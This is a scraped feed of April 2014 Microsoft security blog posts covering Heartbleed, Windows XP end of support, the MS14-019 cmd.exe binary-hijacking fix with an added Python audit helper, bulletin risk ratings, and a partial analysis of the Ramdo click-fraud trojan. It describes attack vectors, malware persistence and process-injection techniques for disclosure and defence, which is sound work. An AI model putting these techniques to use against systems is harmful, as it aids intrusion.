In addition, Windows&rsquo; implementation of SSL/TLS was not impacted.</p> <p>Microsoft always encourages customers to be vigilant with the security of their online accounts, change their account passwords periodically and to use complex passwords. More information on how to create strong passwords is available here: <a href="https://www.microsoft.com/security/pc-security/password-checker.aspx">Microsoft Security &amp; Safety Center: Create strong passwords</a>. &nbsp;<a href="/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627193&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft SecurityOpenSSLencryption keysHeartbleedOpenSSL encryption software library TechNet Radio: IT Time - The Risk of Running Windows XP After Support Endshttp://blogs.technet.com/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspxThu, 10 Apr 2014 20:42:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:23cd2f89-12f0-497c-b8f4-8d5c88fce0d2Microsoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3627191http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3627191http://blogs.technet.com/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspx#comments<p>On Monday, Tim Rains was featured on TechNet Radio in which he discussed &ldquo;The Risk of Running Windows XP After Support Ends&rdquo; with Blain Barton, Senior Technical Evangelist at Microsoft.&nbsp; This is a recommended video for any IT Professionals currently using Windows XP today in their environment.&nbsp; Questions covered in the discussion include:</p> <ul> <li><span 
style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=3m44s">3:44</a>] What are the kind of security risks folks may face as support of XP ends?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=4m48s">4:48</a>] How does Microsoft protect its customers from security threats?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=6m11s">6:11</a>] What exactly does Windows XP end of support mean?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=8m38s">8:38</a>] What is risk of continuing to run XP?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=14m48s">14:48</a>] What motivates cyber attackers?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=18m17s">18:17</a>] What is ransomware?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=21m48s">21:48</a>] What are some typical threats users should expect against Windows XP?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=30m26s">30:26</a>] What should people do if they&rsquo;re running Windows XP?</span></li> </ul> <p><a 
href="/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627191&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">TechNet Radio: IT TimeWindows XP End of SupportThe risk of running Windows XP after support ends Microsoft's cloud contracts approved by European privacy authorities http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/10/article-29-working-group-says-microsoft-cloud-in-line-with-eu-data-protection-law.aspxThu, 10 Apr 2014 20:03:53 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:c2d94518-e2d5-4a6a-b5f0-70d5f4a11b97Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p>A big milestone was achieved this week.&nbsp; The <a href="http://ec.europa.eu/justice/data-protection/article-29/index_en.htm" target="_blank">Article 29 Working Party,</a> a collection of 28 European Union data protection authorities, announced that Microsoft&rsquo;s contractual approach to enterprise cloud services is in line with EU data protection law.&nbsp;&nbsp; <a href="/b/trustworthycomputing/archive/2014/04/04/article-29-working-group-says-microsoft-cloud-in-line-with-eu-data-protection-law.aspx" target="_blank">See more &gt;&gt;</a></p> <p></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/10/article-29-working-group-says-microsoft-cloud-in-line-with-eu-data-protection-law.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626738&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">Brendon LynchCloudTrustBig DataStandardsCloud Computingcloud servicesMicrosoftpersonal dataDataEuropePrivacyMicrosoft Cloud Solutions Protecting Point of Sale Devices from Targeted 
Attackshttp://blogs.technet.com/b/security/archive/2014/04/09/protecting-point-of-sale-devices-from-targeted-attack.aspxWed, 09 Apr 2014 15:59:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3e4441dc-6d7a-49d5-81ba-a1ff2db36b89Microsoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3626103http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3626103http://blogs.technet.com/b/security/archive/2014/04/09/protecting-point-of-sale-devices-from-targeted-attack.aspx#comments<p>Posted by: <strong>Sean Finnegan</strong> Director, Cybersecurity</p> <p>Last week, we published a paper on &ldquo;<a href="http://enterprise.blob.core.windows.net/whitepapers/Retail-Threat-Modeling.pdf">Threat Modeling a Retail Environment</a>.&rdquo; The intent of this paper was to help provide the retail industry with risk and mitigation guidance that could be applied in their environment where there is a unique set of requirements and challenges.&nbsp; As a follow on to that information, today we published a new paper focused on &ldquo;<strong><a href="http://aka.ms/protectingpos">Protecting Point of Sale Devices from Targeted Attacks</a></strong>.&rdquo;&nbsp; Given point of sale (POS) devices were the focus of many recent targeted attacks in the retail industry, we thought this guidance would be helpful.&nbsp;<a href="/b/security/archive/2014/04/01/protecting-point-of-sale-devices-from-targeted-attack.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/09/protecting-point-of-sale-devices-from-targeted-attack.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626103&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Threat modeling retailRetail and SecurityTargeted AttacksPoint of Sale attacks MS14-019 – Fixing a binary hijacking via .cmd or .bat filehttp://blogs.technet.com/b/srd/archive/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file.aspxTue, 08 Apr 2014 17:10:03 
GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:037a8636-d816-470d-b8f4-5bad8e479ebcswiat0<p style="text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">Command (.cmd) and batch (.bat) files can be directly provided as input to the </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> as if it is an executable. </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> uses the cmd.exe automatically to run the input .cmd or .bat.</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">Today, with the bulletin <a href="http://technet.microsoft.com/security/bulletin/MS14-019">MS14-019</a> we are fixing a vulnerability, where in particular scenario it is possible to hijack the cmd.exe with a copy present in the attacker controlled current working directory (CWD) of an affected application. 
</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">The typical attack vector for this vulnerability is same as the DLL hijacking, i.e., via opening an application specific file in a WebDav/SMB share invoking the targeted application automatically because of file association. The targeted application will be vulnerable only if they ever do </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> on .cmd or .bat file irrespective of where the file is located. That means attacker need not control the .cmd or .bat file. Another important thing for exploiting this vulnerability, is that the application should set the directory from where the associated file was opened as its CWD. </span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">As such we are not aware of any application that is affected by this vulnerability. But we understand the security issue this vulnerability can pose to some of the applications, so we are addressing this as an important severity bulletin. 
</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">The way we are fixing this issue is to always invoke the system version of cmd.exe for the input .cmd or .bat file during process creation. This fix could affect applications that call </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> on a .bat or .cmd file directly and depend on a different version of cmd.exe than the one present in the System directory, having copied it into either the application directory or the CWD. Such applications should pass the fully qualified path to their version of cmd.exe as input when calling </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">, and pass the .cmd or .bat file as a parameter. 
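</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">The following is an added example written for this page; it is not Microsoft code and not part of the bulletin. It models the invocation patterns described above so that an application's CreateProcess calls can be audited: a .cmd/.bat handed straight to CreateProcess (the case MS14-019 fixes), a bare "cmd.exe" that the search path may resolve from the application directory or the CWD before the System directory, and the recommended form, a fully qualified cmd.exe with the script passed as a parameter. Function names and the system_root parameter are this example's own assumptions; only CreateProcess's lpApplicationName/lpCommandLine pair and cmd.exe's /c switch come from Windows, and the example assumes the System directory is System32 under the given Windows directory.</span></p>

```python
"""Audit helper for CreateProcess-style invocations of .cmd/.bat scripts.

Added example, not Microsoft code. It classifies (lpApplicationName,
lpCommandLine) pairs by the patterns the MS14-019 post describes and builds
the form the post recommends: the System directory's cmd.exe by fully
qualified path, with the script passed as an argument.
Function names and the 'system_root' parameter are assumptions of this
example; the System directory is assumed to be <system_root>\\System32.
"""
import ntpath

SCRIPT_EXTENSIONS = (".cmd", ".bat")


def first_token(command_line):
    """Return the program token CreateProcess would take from lpCommandLine:
    the first double-quoted run, or the first whitespace-delimited word."""
    s = command_line.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def is_fully_qualified(path):
    """True for drive-absolute (C:\\...) or UNC (\\\\server\\share\\...) paths."""
    drive, tail = ntpath.splitdrive(path)
    return bool(drive) and tail.startswith("\\")


def classify_invocation(application_name, command_line):
    """Classify one invocation:
      'direct-script'   - a .cmd/.bat is the program itself (the MS14-019 case)
      'unqualified-cmd' - bare cmd.exe, resolvable from the app dir or the CWD
      'qualified-cmd'   - cmd.exe named by a fully qualified path
      'other'           - not a script or cmd.exe invocation
    When lpApplicationName is NULL the program comes from lpCommandLine.
    """
    target = application_name if application_name else first_token(command_line)
    ext = ntpath.splitext(target)[1].lower()
    if ext in SCRIPT_EXTENSIONS:
        return "direct-script"
    if ntpath.basename(target).lower() == "cmd.exe":
        return "qualified-cmd" if is_fully_qualified(target) else "unqualified-cmd"
    return "other"


def build_safe_invocation(script_path, system_root):
    """Return (lpApplicationName, lpCommandLine) in the recommended form:
    the System directory's cmd.exe by full path, the script passed via /c."""
    cmd = ntpath.join(system_root, "System32", "cmd.exe")
    return cmd, '"%s" /c "%s"' % (cmd, script_path)


if __name__ == "__main__":
    # Constructed sample calls; the paths are illustrative only.
    samples = [
        (None, "build.bat release"),
        (None, "cmd.exe /c build.bat release"),
        build_safe_invocation("C:\\tools\\build.bat", "C:\\Windows"),
    ]
    for app, cl in samples:
        print("%-15s app=%r cmdline=%r" % (classify_invocation(app, cl), app, cl))
```

<p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">A 'qualified-cmd' result only means the path cannot be redirected by the search order; whether that path is the System directory's cmd.exe, rather than a private copy the application ships, is a separate check against the Windows directory of the machine being audited.</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">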
</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">Applications passing just cmd.exe to </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> to run the .cmd or .bat could also be vulnerable to similar binary hijacking. This bulletin does not address such usage, since it is an application-specific problem: the application is not passing the fully qualified system path to cmd.exe. Such applications should be fixed to pass the fully qualified cmd.exe path, or to pass just the .cmd or .bat file as input.</span></p> <p style="margin:0in 0in 8pt;text-align:justify;"><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p style="text-align:justify;">- Swamy Shivaganga Nagaraju, MSRC engineering team</p> <p style="text-align:justify;"></p><div style="clear:both;"></div>MS14-019 CMD BAT CreateProcess Assessing risk for the April 2014 security updates http://blogs.technet.com/b/srd/archive/2014/04/08/assessing-risk-for-the-april-2014-security-updates.aspxTue, 08 Apr 2014 17:09:51 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:82e7006c-ed10-40fe-b947-6cb57fa1dee1swiat0<p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">Today we released four security bulletins addressing 11 unique CVEs.&nbsp; Two bulletins have a maximum severity rating of Critical while the other two have a 
maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</span></p> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <table style="border-width:1px;border-style:solid;width:669px;height:82px;" border="1"> <tbody> <tr> <td><span style="font-size:medium;"><strong>Bulletin</strong></span></td> <td><span style="font-size:medium;"><strong>Most likely attack vector</strong></span></td> <td><span style="font-size:medium;"><strong>Max Bulletin Severity</strong></span></td> <td><span style="font-size:medium;"><strong>Max exploitability</strong></span></td> <td><span style="font-size:medium;"><strong>Likely first 30 days impact</strong></span></td> <td><span style="font-size:medium;"><strong>Platform mitigations and key notes</strong></span></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-017">MS14-017</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Word)</span></p> </td> <td><span style="font-size:medium;">Victim opens a malicious RTF or DOC/DOCX file.</span></td> <td><span style="font-size:medium;">Critical</span></td> <td>1</td> <td><span style="font-size:medium;">Likely to continue to see RTF and DOC based exploits for CVE-2014-1761.</span></td> <td><span style="font-size:medium;">Addresses vulnerability described by <a href="http://technet.microsoft.com/en-us/security/advisory/2953095">Security Advisory 2953095</a>, an issue under targeted attack.</span></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-018">MS14-018</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Internet Explorer)</span></p> </td> <td><span style="font-size:medium;">Victim browses to a malicious 
webpage.</span></td> <td><span style="font-size:medium;">Critical</span></td> <td>1</td> <td><span style="font-size:medium;">Likely to see reliable exploits developed within next 30 days.</span></td> <td></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-020">MS14-020</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Publisher)</span></p> </td> <td><span style="font-size:medium;">Victim opens malicious Publisher (.PUB) file.</span></td> <td><span style="font-size:medium;">Important</span></td> <td>1</td> <td><span style="font-size:medium;">While we may see reliable exploits developed within the next 30 days, unlikely to see widespread exploitation due to limited deployment of Publisher.</span></td> <td></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-019">MS14-019</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Windows File Handling)</span></p> </td> <td><span style="font-size:medium;">Attacker places malicious .bat and/or .cmd file on a network share from which a victim launches an application that calls CreateProcess in an unsafe manner.&nbsp; Similar attack vector as DLL preloading.</span></td> <td><span style="font-size:medium;">Important</span></td> <td>1</td> <td><span style="font-size:medium;">While this is an exploitable vulnerability, we have historically not seen widespread exploitation of this type of vulnerability.</span></td> <td><span style="font-size:medium;">More details about this vulnerability in <a href="http://blogs.technet.com/b/srd/archive/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file.aspx">this SRD blog</a> post today.</span></td> </tr> </tbody> </table> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p>- Jonathan Ness, MSRC 
engineering team</p><div style="clear:both;"></div>Attack VectorRisk Assessment The April 2014 Security Updateshttp://blogs.technet.com/b/msrc/archive/2014/04/08/the-april-2014-security-updates.aspxTue, 08 Apr 2014 17:00:52 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:22479505-9a1d-485c-90a9-03d8c32b47fcDustin C. Childs0<p><span style="font-size:medium;">T. S. Eliot once said, &ldquo;What we call the beginning is often the end. And to make an end is to make a beginning. The end is where we start from.&rdquo; So as we put one season to bed, let&rsquo;s start another by looking at the </span><a href="http://technet.microsoft.com/security/bulletin/MS14-apr"><span style="color:#0563c1;font-size:medium;">April security updates</span></a><span style="font-size:medium;">. Today, we release four bulletins to address 11 CVEs in Microsoft Windows, Internet Explorer and Microsoft Office. The update for </span><a href="http://technet.microsoft.com/security/bulletin/ms14-017"><span style="color:#0563c1;font-size:medium;">Microsoft Word</span></a><span style="font-size:medium;"> addresses the issues described in </span><a href="http://technet.microsoft.com/security/advisory/2953095"><span style="color:#0563c1;font-size:medium;">Microsoft Security Advisory 2953095</span></a><span style="font-size:medium;">. For those who prioritize, we recommend this bulletin as well as the update for Internet Explorer be on the top of your list.</span></p> <p><span style="font-size:medium;">We would be remiss if we did not mention another end: the end of support for Windows XP and Office 2003. The updates provided by MS14-018 and MS14-019 will be the final security updates for Windows XP; MS14-017 and MS14-020 are the final updates for Office 2003. 
&nbsp;For those who haven&rsquo;t migrated yet, I recommend visiting the </span><a href="http://blogs.technet.com/b/security/archive/2014/03/24/cyber-threats-to-windows-xp-and-guidance-for-small-businesses-and-individual-consumers.aspx"><span style="color:#0563c1;font-size:medium;">Microsoft Security Blog</span></a><span style="font-size:medium;">, where my colleague Tim Rains provides guidance for consumers and small businesses who may have questions about how end of support affects them. Enterprise administrators will also find this a worthwhile read. </span></p> <p><span style="font-size:medium;">Here&rsquo;s an overview of all the updates released this month:</span></p> <p><i><span style="font-size:medium;">Click to enlarge</span></i></p> <p><i><span style="font-size:medium;"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/deployment.jpg"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/deployment.jpg" border="0" /></a><br /></span></i></p> <p><span style="font-size:medium;">Our top priorities for this month are MS14-018 and MS14-017, which address issues in Internet Explorer and Microsoft Word respectively.</span></p> <p><a href="http://technet.microsoft.com/security/bulletin/ms14-018"><span style="color:#0563c1;font-size:medium;">MS14-018 | Cumulative Update for Internet Explorer</span></a></p> <p><span style="font-size:medium;">This security update resolves six privately reported vulnerabilities in Internet Explorer. These vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. While the issues addressed by this bulletin are very straightforward, I wanted to specifically call your attention to the updates for Internet Explorer 11 on Windows 8.1 and Windows Server 2012 R2. 
For these platforms, the update is not cumulative &ndash; it only addresses the issues described in this bulletin. You also have the option of installing KB2919355, which is a cumulative update for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2. In addition to previous updates for these operating systems, it includes enhancements such as improved Internet Explorer 11 compatibility for enterprise applications, usability improvements, extended mobile device management, and improved hardware support. Additionally, for Windows Server 2012 R2, it includes support for clustering configurations for hosters. For more information about this update, see </span><a href="http://support.microsoft.com/kb/2919355"><span style="color:#0563c1;font-size:medium;">Microsoft Knowledge Base Article 2919355</span></a><span style="font-size:medium;">.</span></p> <p><span style="font-size:medium;">Similarly, customers running Internet Explorer 11 on Windows 7 and Windows Server 2008 R2 can also choose a cumulative update: </span><a href="http://support.microsoft.com/kb/2929437"><span style="color:#0563c1;font-size:medium;">KB2929437</span></a><span style="font-size:medium;">. In addition to previous updates for Internet Explorer 11 on these operating systems, it includes enhancements such as improved Internet Explorer 11 compatibility for enterprise applications. If you install this cumulative update, you will not need to install the KB2936068 update offered through MS14-018. There may also be some who overlook the update for Internet Explorer 10. For this version of the browser, the update is non-security. The issues addressed by this bulletin do not impact Internet Explorer 10, but the update does include non-security related changes. 
For more information about the non-security-related fixes that are included in this update, see&nbsp;<a href="http://support.microsoft.com/kb/2936068">Microsoft Knowledge Base Article 2936068</a></span><span style="font-size:medium;">.</span></p> <p><a href="http://technet.microsoft.com/security/bulletin/ms14-017"><span style="color:#0563c1;font-size:medium;">MS14-017 | Vulnerabilities in Microsoft Word and Office Web Apps Could Allow Remote Code Execution</span></a></p> <p><span style="font-size:medium;">This security update resolves one publicly disclosed vulnerability and two privately reported vulnerabilities in Microsoft Word. The most severe of these vulnerabilities could allow remote code execution if a specially crafted file is opened in an affected version of Microsoft Office software. This security update also addresses the vulnerability first described in </span><a href="http://technet.microsoft.com/security/advisory/2953095"><span style="color:#0563c1;font-size:medium;">Microsoft Security Advisory 2953095</span></a><span style="font-size:medium;">. If you have installed the Fix it provided through this advisory, you should remove it once you apply the update to ensure RTF files open correctly. </span></p> <p><span style="font-size:medium;">Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801"><span style="color:#0563c1;">Security Advisory 2755801</span></a> with the latest update for Adobe Flash Player in Internet Explorer. 
The update addresses the vulnerabilities described in Adobe Security bulletin APSB14-09. For more information about this update, including download links, see Microsoft Knowledge Base Article 2942844.</span></p> <p><span style="font-size:medium;">Watch the bulletin overview video for a brief summary of today&#39;s releases.</span></p> <p><span style="font-size:medium;"><a href="http://www.youtube.com/v/jz55QSOaFbI?version=3&amp;hl=en_US">Bulletin overview video (YouTube)</a></span></p> <p><span style="font-size:medium;">For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the <a href="http://technet.microsoft.com/security/bulletin/MS14-apr"><span style="color:#0563c1;">Microsoft Bulletin Summary Web page</span></a>. </span></p> <p><span style="font-size:medium;">William Peteroy and I will host the monthly bulletin webcast, scheduled for Wednesday, April 9, 2014, at 11 a.m. PDT. I invite you to register <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572978&amp;Culture=en-US"><span style="color:#0563c1;">here</span></a>, and tune in to learn more about this month&rsquo;s security bulletins and advisories. </span></p> <p><span style="font-size:medium;">For all the latest information, you can also follow us at <a href="http://www.twitter.com/msftsecresponse"><span style="color:#0563c1;">@MSFTSecResponse</span></a>. </span></p> <p><span style="font-size:medium;">Please join me in wishing Windows XP and Office 2003 a fond farewell as they head towards the sunset of their lives. 
I look forward to hearing your questions about this month&rsquo;s release in our webcast tomorrow.</span></p> <p><span style="font-size:medium;">Thanks, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a></span><span style="font-size:medium;"> <br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div>Microsoft Windowsmonthly bulletin releaseSecurity BulletinBulletinsInternet Explorer (IE)Microsoft Office MSRT April 2014 – Ramdohttp://blogs.technet.com/b/mmpc/archive/2014/04/08/msrt-april-2014-ramdo.aspxTue, 08 Apr 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:de99ef72-d34b-4299-8f69-3122f0d8ba9bmsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/04/08/msrt-april-2014-ramdo.aspx#comments<div class="ExternalClass7ACCDACE2EE447D5AAA088FB98DDF72D"> <p>This month we added <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Ramdo">Win32/Ramdo</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Kilim">Win32/Kilim</a> to the Microsoft Malicious Software Removal Tool. In this blog, we will focus on Ramdo and some of what we have since found out about this relatively new trojan family. Ramdo, a click-fraud bot with built-in antisinkhole and antivirtualization code, was first found in the wild in December 2013.</p> <h3>Telemetry</h3> <p>Compared to other big families, Win32/Ramdo&rsquo;s impact is relatively small in terms of the number of infected machines. However, when one of our customers gets infected with it, the impact is big on that machine: bandwidth and CPU power are exhausted to generate profit for the malware authors, and exploits can be deployed to install additional malware. 
We aim to resolve this problem for our customers by adding this family to the MSRT.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo1.png"><img width="500" alt="Machine count" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo1.png" border="0" /></a>&nbsp;</p> <em>Figure 1: Ramdo-infected machines during February and March 2014</em><br /> <h3>Infection</h3> <p>Ramdo has been deployed by exploit kits such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Exploit:HTML/Pangimop.C"> HTML/Pangimop</a> (also known as Magnitude) as well as the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Vobfus">Vobfus</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Beebone">Beebone</a> families. It is usually installed in the background without being noticed, and immediately copies itself into the <a href="http://www.microsoft.com/security/portal/mmpc/shared/variables.aspx#startupfolder">&lt;startup&gt;</a> folder with one of the following names:</p> <ul> <li><em>EPUHelp.exe</em></li> <li><em>HpM3Util.exe</em></li> </ul> <p>An additional DLL is also created by setting the IMAGE_FILE_DLL flag in the PE file header&rsquo;s characteristics. It is then dropped to one of the following paths:</p> <ul> <li><em> <a href="http://www.microsoft.com/security/portal/mmpc/shared/variables.aspx#appdata">%AppData%</a>\version.dll</em></li> <li><em> <a href="http://www.microsoft.com/security/portal/mmpc/shared/variables.aspx#appdata">%AppData%</a>\Adobe\acupx217.dll</em></li> </ul> <p>The DLL is encrypted by the <em>EncryptFileW </em>API and is injected into the newly created system process (<em>services.exe </em>or <em>taskhost.exe</em>) as the trojan&rsquo;s payload.</p> <h3>Payload</h3> <p>Ramdo stores its configuration data in the registry, encrypted with RC4. 
